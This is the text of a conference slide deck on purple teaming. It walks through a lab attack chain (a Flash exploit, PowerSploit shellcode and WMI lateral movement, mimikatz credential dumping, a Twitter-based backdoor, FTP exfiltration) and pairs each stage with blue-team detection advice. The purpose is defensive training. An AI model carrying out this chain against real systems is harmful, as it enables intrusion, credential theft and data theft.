Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Purple View


Published on

The recent trend of using Attack and Defense Together.

Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.

Published in: Technology
  • Be the first to comment

Purple View

  1. 1. Purple View The recent trend of using Attack and Defense Together Not OUR idea - backed by many @raffertylaura | @haydnjohnson
  2. 2. Quick who are we Haydn Johnson @haydnjohnson OSCP Offensive/Attack Interest Enjoys presenting Laura @raffertylaura MSc Computer Science (Security/Privacy) Interested in both sides of security Loooooves presenting @raffertylaura | @haydnjohnson
  3. 3. Contents 1. Basic Term Definition 2. Introduction to Red, Blue and Purple 3. Run through of an Attack ○ Gaining Access ○ Lateral Movement ○ Domain Admin ○ Maintaining Access ○ Data Exfiltration 4. For each attack: ○ Attacking View ○ Defenders View ○ Possible Purple Team exercises @raffertylaura | @haydnjohnson
  4. 4. Definitions Exploit - The thing used to gain unauthorized access to a system Payload - What is done after the access is gained (shell, command) Metasploit - An open source exploit framework, modular Meterpreter - an advanced, extensible payload that uses in-memory DLL injection Shell - Gaining Terminal/CMD access remotely
  5. 5. Red Team - Penetration | Offensive ● Scans ● Exploits ● Logic abuse ● Access to things they shouldn’t @raffertylaura | @haydnjohnson
  6. 6. Blue Team - Block, Prevent, Detect | Defensive ● Logs ● Emails ● Events ● Triggers ● Networking ● More Logs @raffertylaura | @haydnjohnson
  7. 7. Red Team - Goals ● Model recent threats and trends ● Longer term ● Highlight Gaps in Security Controls, detection etc ● Escape and Evade for Persistence @raffertylaura | @haydnjohnson
  8. 8. Blue Team - Goals ● Detect Attack ● Respond and Recover ● Produce Actionable Intelligence ● Identify Gaps and investment needs @raffertylaura | @haydnjohnson
  9. 9. Purple Team - Offensive & Defensive Working together to achieve the ultimate goal of making the organization more secure ● Exposes blue team to different threats & attacker mindset ● Test incident detection and response ● Allows red team to sharpen skills ● Policy and procedures tested ● Tuning of controls @raffertylaura | @haydnjohnson
  10. 10. Purple Team - Offensive & Defensive Different types of Purple Teaming ● Read Team Sitting with Network Defense team ● Adversary Simulation ● Traffic Generation ● ● Wargaming Requires total picture involving all areas of the organization @raffertylaura | @haydnjohnson
  11. 11. Purple Team - The difference ● Using Security Posture and Weaknesses to find what is most valuable ● Goal Oriented ● Review attack ● Test how teams use services and how they are managed @raffertylaura | @haydnjohnson
  12. 12. Purple Team - The difference ● Time to Domain Admin ● Time to Data/Objective ● Time to Respond ● Time to Recover ● Identify where there needs to be more investment ● Measure Impact Done right, the blue team should come out with better monitoring and response plans. @raffertylaura | @haydnjohnson
  13. 13. Purple Team - The difference ● Set up a fake scenario - Assume Breach ● How will the attacker gain access? ● Why have they attacked, what do they want? ● How did they move through the network? ● If they exfiltrated data, how? Do not turn off servers, block IP addresses, make it realistic @raffertylaura | @haydnjohnson
  14. 14. Purple Team - Exercise “In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.” - Raphael Mudge @raffertylaura | @haydnjohnson
  15. 15. Purple Team - DEMO (step by step) Our exercise @raffertylaura | @haydnjohnson
  16. 16. Purple Team - Demo Architecture @raffertylaura | @haydnjohnson Domain:
  17. 17. Tools Used Red Team: ● Kali Linux ● Metasploit ● Meterpreter ● PowerSploit ● Twittor Blue Team: ● Wireshark ● Windows Event Logs @raffertylaura | @haydnjohnson
  18. 18. Setting up Windows GP @raffertylaura | @haydnjohnson
  19. 19. Gaining Access Hacking Team Flash Exploit @raffertylaura | @haydnjohnson
  20. 20. Flash Exploits @raffertylaura | @haydnjohnson ● Flash plugins are vulnerable ○ You can embed a javascript/binary within a Flash file ○ ActionScript to define events to redirect to landing page ● Most exploit kit landing pages redirect to pages containing Flash exploits ○ Angler ○ Nuclear ○ Fiesta ● Installed by default on browser ● New vulnerabilities are identified on almost a weekly basis
  21. 21. Gaining Access @raffertylaura | @haydnjohnson Flash
  22. 22. A: Flash Exploit from SecurityFocus Hacking Team Flash Exploit:
  23. 23. A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
  24. 24. A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
  25. 25. Client1 User navigates to malicious site which redirects to the exploit A: Redirect Victim @raffertylaura | @haydnjohnson
  26. 26. A: Client1 is exploited @raffertylaura | @haydnjohnson
  27. 27. A: A session is now established with Client1 We can now run Meterpreter @raffertylaura | @haydnjohnson
  28. 28. B: Wireshark: Landing Page and Redirect @raffertylaura | @haydnjohnson
  29. 29. B: Wireshark: Shell @raffertylaura | @haydnjohnson
  30. 30. B: What can you take away Security Onion, implement it, free Has snort rules for Flash exploits (need to install) Confirm if flash is needed for business reasons Keep flash updated 2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules) 2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules) @raffertylaura | @haydnjohnson
  31. 31. Purple Team - Exercise ● Blue team understands how attackers can gain initial access ● Flash exploits - ongoing issue ● Helps blue team to identify suspicious traffic and what is happening from the attacker perspective ● Red team sees how attacks are visible by blue team and think of ways to make it more stealthy @raffertylaura | @haydnjohnson
  32. 32. Privilege Escalation Not Shown @raffertylaura | @haydnjohnson
  33. 33. Privilege Escalation ● We are skipping privilege escalation from Domain User to Local Admin @raffertylaura | @haydnjohnson
  34. 34. Lateral Movement PowerSploit @raffertylaura | @haydnjohnson
  35. 35. A: PowerSploit Available on Github Open Source @raffertylaura | @haydnjohnson
  36. 36. A: PowerSploit More than 1 script! PowerShell Modules @raffertylaura | @haydnjohnson
  37. 37. PowerView Part of PowerShell Empire Very advanced @raffertylaura | @haydnjohnson
  38. 38. A: Lateral Movement The same local Administrator account passwords on multiple computers. by Sean Metcalf @raffertylaura | @haydnjohnson
  39. 39. Same Passwords for All Local Admins
  40. 40. A: Lateral Movement @raffertylaura | @haydnjohnson
  41. 41. A: Lateral Movement Powersploit Remote Powershell Using Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
  42. 42. A: Base64 Encoding Payload Remove issues with whitespace The Hacker Playbook 1 (now 2) @raffertylaura | @haydnjohnson
  43. 43. A: Hosting Powersploit Invoke--Shellcode.ps1 PowerSploit code hosted on local Kali machine @raffertylaura | @haydnjohnson
  44. 44. A: Invoke-WmiMethod Use powershell to connect remotely, create a new process and launch the IEX cradle. Calls Windows Management Instrumentation (WMI) methods. The Win32_Process WMI class allows creation of a process. @raffertylaura | @haydnjohnson
  45. 45. A: Execute Remote command Execute command from Client1 to tell Client2 to download and execute shellcode @raffertylaura | @haydnjohnson
  46. 46. A: Client1 gives same password Same password across multiple clients @raffertylaura | @haydnjohnson
  47. 47. A: Receive Shell @raffertylaura | @haydnjohnson
  48. 48. B: WireShark traffic TCP Hand Shake Bind Requests @raffertylaura | @haydnjohnson
  49. 49. B: Client1 requests remote instance on Client2 @raffertylaura | @haydnjohnson
  50. 50. B: Client2 eventually asks where is Kali @raffertylaura | @haydnjohnson
  51. 51. B: Client2 downloads Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
  52. 52. B: Client1 logs into Client2 @raffertylaura | @haydnjohnson
  53. 53. B: PowerShell Process Created @raffertylaura | @haydnjohnson
  54. 54. B: PowerShell connects to Kali Client2 reaches out to Kali on port 80 @raffertylaura | @haydnjohnson
  55. 55. B: What can you take away Event Correlation - based on event ID, source and destination for remote connections Implement alerting based on Security Events together SIEM can/SHOULD do this Use Log MD - really great logging tool, especially for powershell @raffertylaura | @haydnjohnson through-the-junk
  56. 56. Purple Team - Benefits ● Identify ways to move around the network ● Identify and confirm Defensive Controls in Place ● Identify what worked, what did not ● Implement changes ● Justification for resources @raffertylaura | @haydnjohnson
  57. 57. Privilege Escalation Local Admin to Domain Admin @raffertylaura | @haydnjohnson
  58. 58. A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson ● Why escalate privileges from Local Admin to Domain Admin? ● Domain admin - control over active directory! ● Access IT resources ● Create accounts ● Propagate malware
  59. 59. A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson
  60. 60. A: Local Admin to Domain Admin From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll @raffertylaura | @haydnjohnson
  61. 61. A: Local Admin to Domain Admin Use psexec to run mimikatz.exe on Client2 @raffertylaura | @haydnjohnson
  62. 62. A: Local Admin to Domain Admin Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2! @raffertylaura | @haydnjohnson
  63. 63. B: Wireshark: @raffertylaura | @haydnjohnson
  64. 64. B: Event Logs Client1 logs into Client2 local admin
  65. 65. B: Event Logs Client1 runs mimikatz on Client2 @raffertylaura | @haydnjohnson
  66. 66. B: Event Logs Sensitive privilege use from Client1 to Client2
  67. 67. B: What can you take away ● Prevention: ○ Access control for shared drive ○ Limit access to psexec and monitor use ○ Active Directory best practices ● Detection: ○ IDS signatures ○ SIEM use case - Event correlation between system logs and network proxy logs ○ For lateral movement: enable file level auditing ○ Canary accounts
  68. 68. Purple Team - Benefits ● Blue team observes vulnerabilities/threats which may not have been considered ○ Learns how attacker could escalate privileges from local admin to domain admin ● Red team observes the footprint left behind from this attack and possibly how to minimize it ○ Can identify potential weaknesses in blue team monitoring/response processes ○ Provide more thorough recommendations @raffertylaura | @haydnjohnson
  69. 69. Twittor Backdoor using Twitter @raffertylaura | @haydnjohnson
  70. 70. A: Twittor ● Easy to install ● Easy to Use ● Easy to add Shellcode @raffertylaura | @haydnjohnson
  71. 71. A: Twittor - insides Simple Subprocess execution Stored as base64 encoded message
  72. 72. A: Pyinstaller On Github Turn Python file into EXE @raffertylaura | @haydnjohnson
  73. 73. A: Pyinstaller Python File becomes Executable @raffertylaura | @haydnjohnson
  74. 74. @raffertylaura | @haydnjohnson Twittor: Backdoor Using Twitter
  75. 75. A: Twittor Python file used as C2 Server Python file used as backdoor EXE - Pyinstaller @raffertylaura | @haydnjohnson
  76. 76. A: Twittor - Retrieving command Send Command to execute Retrieve command @raffertylaura | @haydnjohnson
  77. 77. B: Twittor - Network Traffic Reaching out to API Normal User Traffic?? @raffertylaura | @haydnjohnson
  78. 78. B: Twittor - Client system Backdoor as Python Executable compiled with --no-console flag to hide output @raffertylaura | @haydnjohnson
  79. 79. B: Traffic from Client Reaches out to twitter Src and Destination are internal IPs, sends to API @raffertylaura | @haydnjohnson
  80. 80. B: What can you take away Check if there are any remote connections after hours, is it against policy? Again, Correlate logs with known C2 addresses See if AV picks it up @raffertylaura | @haydnjohnson
  81. 81. Purple Team - Benefits Test if a C2 can reach out to twitter. Social Media may be blocked via the browser, but some sites can still be accessed via API etc. If it is not blocked, why not, can your blue team help to stop this and others. @raffertylaura | @haydnjohnson
  82. 82. Data Exfiltration Clear Text FTP @raffertylaura | @haydnjohnson
  83. 83. @raffertylaura | @haydnjohnson A: Data Exfiltration Through Clear Text FTP
  84. 84. A: FTP Extraction Finding Data to extract @raffertylaura | @haydnjohnson
  85. 85. A: Finding data Important data identified @raffertylaura | @haydnjohnson
  86. 86. A: Downloading data @raffertylaura | @haydnjohnson
  87. 87. A: Data Transferred @raffertylaura | @haydnjohnson
  88. 88. B: Meterpreter connection DLL injection Lots of chatter @raffertylaura | @haydnjohnson
  89. 89. B: FTP connection Clear Text @raffertylaura | @haydnjohnson
  90. 90. B: Successful Transfer @raffertylaura | @haydnjohnson
  91. 91. B: What can you take away? @raffertylaura | @haydnjohnson Disable FTP - should not have a business need for it really If there is a business need whitelist those IP addresses | Create a group of users specifically for FTP
  92. 92. Purple Team - Exercise Clear Text Will any alarms trigger? Understand potential holes in alerting Measure time to detect and respond @raffertylaura | @haydnjohnson
  93. 93. Conclusion Purple Teaming is Good @raffertylaura | @haydnjohnson
  94. 94. Purple Team - Reiteration Provides more value than a Penetration Test Should be implemented into a regular schedule Helps train security personnel Helps make sure your boxes are tuned @raffertylaura | @haydnjohnson
  95. 95. Limitations and Future Work ● So far we have limited detection tools to Windows Server event logs and Wireshark, (and a bit of Snort) ● Could be extended for enterprise security tools such as SIEM/IDS ● Powershell/WMI for blue team ● More advanced attacks, persistence using Powershell Empire @raffertylaura | @haydnjohnson
  96. 96. Obligatory Cute Kat Picture
  97. 97. References are in following slides @raffertylaura | @haydnjohnson
  98. 98. Microsoft - 8 minute Video @raffertylaura | @haydnjohnson
  99. 99. Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013 @raffertylaura | @haydnjohnson
  100. 100. A: Downloads PowerShell file Client2 reaches out to Kali machine @raffertylaura | @haydnjohnson